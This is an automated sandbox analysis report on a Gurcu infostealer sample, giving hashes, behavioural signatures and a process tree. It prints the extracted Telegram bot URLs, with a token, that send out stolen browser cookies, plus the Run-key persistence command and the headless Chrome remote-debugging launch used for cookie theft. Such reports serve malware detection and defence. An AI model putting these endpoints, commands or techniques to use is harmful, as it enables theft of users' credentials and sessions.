Analysis
-
max time kernel
103s -
max time network
121s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
06/04/2025, 19:39
Static task
static1
Behavioral task
behavioral1
Sample
generated30.exe
Resource
win10ltsc2021-20250314-en
General
-
Target
generated30.exe
-
Size
938KB
-
MD5
2517b502d7714a4e384044a0b6c2a157
-
SHA1
aa974d57b3b42a1a72afbe2520ae7333e35d7531
-
SHA256
66fc943f11f465b81234c1fd1a9dfecb87082fe2560a0b1865c2679a927c76c0
-
SHA512
f3a87225fecced58e540bab65087e45f7340307b77673e566e7074354cf3f4668815ce56bf5f04fc6dba847a0330fc89cc7c8a4ca48d2b725e39a564f4ae46aa
-
SSDEEP
24576:q7DB0lkqjVnlqud+/2P+A0+lyv0PTVbUkIaMUcfL8lNsO:q7F0lkqXfd+/9AHly8Pv6Ucz8
Malware Config
Extracted
gurcu
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendMessage?chat_id=6565043849
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20youtube.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Chrom
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20youtube.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Microsoft%20Edg
https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/getUpdates?offset=-
Signatures
-
Gurcu family
-
Uses browser remote debugging 2 TTPs 19 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4084 chrome.exe 3460 msedge.exe 964 chrome.exe 2732 chrome.exe 5868 msedge.exe 1032 msedge.exe 3484 msedge.exe 5944 msedge.exe 3484 msedge.exe 2928 msedge.exe 5060 chrome.exe 2432 chrome.exe 4272 chrome.exe 3496 chrome.exe 3536 msedge.exe 2044 chrome.exe 4304 chrome.exe 5076 msedge.exe 4628 chrome.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-73851796-4078923053-1419757224-1000\Control Panel\International\Geo\Nation generated30.exe Key value queried \REGISTRY\USER\S-1-5-21-73851796-4078923053-1419757224-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 2 IoCs
pid Process 4832 svchost.exe 5036 svchost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-73851796-4078923053-1419757224-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdater = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdater\\svchost.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 9 raw.githubusercontent.com 10 raw.githubusercontent.com 22 raw.githubusercontent.com 34 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 4688 tasklist.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\mr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\pt_BR\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\lo\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ca\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\cy\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\hi\messages.json msedge.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\offscreendocument_main.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\vi\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ne\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\gu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\hr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\no\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\af\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\nl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\pa\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\page_embed_script.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\uk\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ro\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\hu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\tr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\am\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\el\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\fil\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\pt_PT\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\zh_TW\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\sr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\km\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\zh_CN\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\en_GB\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ru\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\hy\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\pl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\te\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\et\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\si\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\dasherSettingSchema.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\zh_HK\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\en_US\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\es_419\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ka\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ml\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\bg\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\az\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\en_CA\messages.json msedge.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\offscreendocument.html msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\lt\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\mn\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\is\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ur\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\iw\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\fi\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\fr_CA\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\lv\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\th\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\be\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\fa\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\sv\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\ms\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\es\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5868_2032542613\_locales\id\messages.json msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4652 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133884420116949798" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-73851796-4078923053-1419757224-1000\{DE35FF7D-E8F4-4EFA-B38F-6278DB67778C} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-73851796-4078923053-1419757224-1000\{3770FBE5-239A-4E07-9F81-56FC8E898569} msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 5180 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 1356 generated30.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 4832 svchost.exe 5060 chrome.exe 5060 chrome.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe 5036 svchost.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 1356 generated30.exe Token: SeDebugPrivilege 4688 tasklist.exe Token: SeDebugPrivilege 4832 svchost.exe Token: SeDebugPrivilege 5036 svchost.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe Token: SeShutdownPrivilege 5060 chrome.exe Token: SeCreatePagefilePrivilege 5060 chrome.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5060 chrome.exe 5868 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1356 wrote to memory of 2460 1356 generated30.exe 86 PID 1356 wrote to memory of 2460 1356 generated30.exe 86 PID 2460 wrote to memory of 4672 2460 cmd.exe 88 PID 2460 wrote to memory of 4672 2460 cmd.exe 88 PID 2460 wrote to memory of 4688 2460 cmd.exe 89 PID 2460 wrote to memory of 4688 2460 cmd.exe 89 PID 2460 wrote to memory of 4924 2460 cmd.exe 90 PID 2460 wrote to memory of 4924 2460 cmd.exe 90 PID 2460 wrote to memory of 4652 2460 cmd.exe 91 PID 2460 wrote to memory of 4652 2460 cmd.exe 91 PID 2460 wrote to memory of 4832 2460 cmd.exe 93 PID 2460 wrote to memory of 4832 2460 cmd.exe 93 PID 4832 wrote to memory of 5004 4832 svchost.exe 95 PID 4832 wrote to memory of 5004 4832 svchost.exe 95 PID 5004 wrote to memory of 5180 5004 cmd.exe 97 PID 5004 wrote to memory of 5180 5004 cmd.exe 97 PID 4832 wrote to memory of 5060 4832 svchost.exe 100 PID 4832 wrote to memory of 5060 4832 svchost.exe 100 PID 5060 wrote to memory of 5108 5060 chrome.exe 101 PID 5060 wrote to memory of 5108 5060 chrome.exe 101 PID 4632 wrote to memory of 5036 4632 cmd.exe 102 PID 4632 wrote to memory of 5036 4632 cmd.exe 102 PID 5060 wrote to memory of 6020 5060 chrome.exe 103 PID 5060 wrote to memory of 6020 5060 chrome.exe 103 PID 5060 wrote to memory of 5460 5060 chrome.exe 104 PID 5060 wrote to memory of 5460 5060 chrome.exe 104 PID 5060 wrote to memory of 4600 5060 chrome.exe 105 PID 5060 wrote to memory of 4600 5060 chrome.exe 105 PID 5060 wrote to memory of 964 5060 chrome.exe 106 PID 5060 wrote to memory of 964 5060 chrome.exe 106 PID 5060 wrote to memory of 2432 5060 chrome.exe 107 PID 5060 wrote to memory of 2432 5060 chrome.exe 107 PID 5060 wrote to memory of 4628 5060 chrome.exe 109 PID 5060 wrote to memory of 4628 5060 chrome.exe 109 PID 5060 wrote to memory of 4272 5060 chrome.exe 110 PID 5060 wrote to memory of 4272 5060 chrome.exe 110 PID 5060 wrote to memory of 3660 5060 chrome.exe 112 PID 5060 wrote to memory of 3660 5060 chrome.exe 112 PID 5060 wrote to memory of 416 5060 chrome.exe 113 PID 5060 wrote to memory of 416 5060 chrome.exe 113 PID 5060 wrote to memory of 4360 5060 chrome.exe 115 PID 5060 wrote to memory of 4360 5060 chrome.exe 115 PID 5060 wrote to memory of 5184 5060 chrome.exe 116 PID 5060 wrote to memory of 5184 5060 chrome.exe 116 PID 5060 wrote to memory of 6064 5060 chrome.exe 117 PID 5060 wrote to memory of 6064 5060 chrome.exe 117 PID 5060 wrote to memory of 2940 5060 chrome.exe 118 PID 5060 wrote to memory of 2940 5060 chrome.exe 118 PID 5060 wrote to memory of 2044 5060 chrome.exe 119 PID 5060 wrote to memory of 2044 5060 chrome.exe 119 PID 5060 wrote to memory of 2732 5060 chrome.exe 120 PID 5060 wrote to memory of 2732 5060 chrome.exe 120 PID 5060 wrote to memory of 4304 5060 chrome.exe 121 PID 5060 wrote to memory of 4304 5060 chrome.exe 121 PID 5060 wrote to memory of 3496 5060 chrome.exe 122 PID 5060 wrote to memory of 3496 5060 chrome.exe 122 PID 5060 wrote to memory of 4084 5060 chrome.exe 123 PID 5060 wrote to memory of 4084 5060 chrome.exe 123 PID 5060 wrote to memory of 3596 5060 chrome.exe 124 PID 5060 wrote to memory of 3596 5060 chrome.exe 124 PID 4832 wrote to memory of 5868 4832 svchost.exe 125 PID 4832 wrote to memory of 5868 4832 svchost.exe 125 PID 5868 wrote to memory of 4508 5868 msedge.exe 126 PID 5868 wrote to memory of 4508 5868 msedge.exe 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\generated30.exe"C:\Users\Admin\AppData\Local\Temp\generated30.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp73C8.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp73C8.tmp.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:4672
-
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 1356"3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4688
-
-
C:\Windows\system32\find.exefind ":"3⤵PID:4924
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak3⤵
- Delays execution with timeout.exe
PID:4652
-
-
C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe"C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4832 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdater /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe /f4⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdater /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\svchost.exe /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:5180
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --no-sandbox --disable-gpu4⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ffbc92ddcf8,0x7ffbc92ddd04,0x7ffbc92ddd105⤵PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2144,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1880 /prefetch:25⤵PID:6020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2164,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2156 /prefetch:35⤵PID:5460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2392,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2388 /prefetch:85⤵PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2988,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2984 /prefetch:15⤵
- Uses browser remote debugging
PID:964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3032,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3024 /prefetch:15⤵
- Uses browser remote debugging
PID:2432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3576,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3572 /prefetch:25⤵
- Uses browser remote debugging
PID:4628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4048,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4044 /prefetch:15⤵
- Uses browser remote debugging
PID:4272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4624,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4620 /prefetch:85⤵PID:3660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4724,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4720 /prefetch:85⤵PID:416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4928,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4924 /prefetch:85⤵PID:4360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4716,i,11771427583727874291,12038308435175353305,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4720 /prefetch:85⤵PID:5184
-
-
